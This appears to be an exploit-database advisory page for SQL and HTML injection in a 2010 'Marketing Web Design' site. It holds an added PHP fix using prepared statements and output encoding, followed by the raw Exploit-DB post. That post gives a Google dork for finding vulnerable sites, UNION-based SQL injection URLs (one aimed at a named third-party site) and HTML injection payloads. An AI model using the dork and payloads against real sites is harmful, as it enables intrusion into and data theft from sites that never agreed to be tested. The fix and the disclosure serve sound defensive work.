Vendor: N/A
By: XroGuE
CVSS: 7.5 (HIGH)
Type: SQL Injection & HTML Injection
CWE: 89, 79
Product Name: N/A
Affected Version From: All
Affected Version To: All
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Marketing Web Design Multiple Vulnerabilities

Marketing Web Design is prone to multiple vulnerabilities, including SQL injection and HTML injection. An attacker can exploit these issues to manipulate SQL queries, access or modify sensitive data, execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site, and possibly launch other attacks.

Mitigation:

Ensure that user-supplied input is properly sanitized and filtered before being used in SQL queries.
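
One way to apply this mitigation to the numeric `id` parameter the advisory targets, covering both the SQL injection and the HTML injection. This is an added PHP example, not code from the affected product or from the advisory; the `fotos` table, the `title` column, the function names and the in-memory SQLite database are assumptions.

```php
<?php
declare(strict_types=1);

// Added example. Table `fotos`, column `title` and all function names are assumptions.

/** Returns the id as an int >= 1, or null for anything that is not an integer. */
function parse_id(?string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return is_int($id) ? $id : null;
}

/** Returns [HTTP status, HTML body] for a verfoto.php-style request. */
function render_photo(PDO $db, ?string $rawId): array
{
    $id = parse_id($rawId);
    if ($id === null) {
        return [400, 'Invalid id'];   // fixed text: the raw input is never echoed
    }
    // The value is bound as a typed parameter, never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT title FROM fotos WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $title = $stmt->fetchColumn();
    if ($title === false) {
        return [404, 'Not found'];
    }
    // Stored data is also encoded on output, so markup in it renders as text.
    $safe = htmlspecialchars((string) $title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return [200, '<h1>' . $safe . '</h1>'];
}

// Constructed demo data in an in-memory SQLite database (needs the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE fotos (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO fotos (id, title) VALUES (1, 'Team <b>photo</b>')");

// Constructed inputs: one valid id, then the two parameter shapes shown in the advisory.
foreach (['1', '1 and 1=1', '<marquee>x</marquee>', null] as $input) {
    [$status, $body] = render_photo($db, $input);
    echo var_export($input, true), ' => ', $status, ' ', $body, PHP_EOL;
}
```

In a real page handler the status would be passed to `http_response_code()` before the body is sent.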

Exploit-DB raw data:

=======================================================================
# Marketing Web Design Multiple Vulnerabilities
=======================================================================
>> Exploit database separated by exploit type (local, remote, DoS, etc.)

[+] Site : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com

I'm XroGuE member from Inj3ct0r Team

########################################################################
# Name: Marketing Web Design Multiple Vulnerabilities
# Vendor: http://www.marketingwebdesign.net
# Date: 2010-05-29
# Author: XroGuE
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: (-_+)
########################################################################

[+] Dork: intext:"Marketing Web Design - Posicionamiento en Buscadores"


[+] Vulnerability Page: All Pages :))

########################################################################

[+] SQL InjecTion Vulnerability:

[+] Demo: http://server/verfoto.php?id=1+and+1=1 [and+1=2]
http://www.hoopstats.com.ar/ver-noticia.php?id=-9999+and+1=2+union select 1,version(),3,4,5,6,7,8,9--


########################################################################

[+] HTML InjecTion Vulnerability:

[+] Demo: http://server/verfoto.php?id=<marquee><font color=Blue size=15>XroGuE</font></marquee>
http://server/ver-noticia.php?id=<marquee><font color=Blue size=15>XroGuE</font></marquee>

########################################################################

[+] XSS InjecTion Vulnerability:

[+] Demo: http://server/verfoto.php?id=
http://server/ver-noticia.php?id=

########################################################################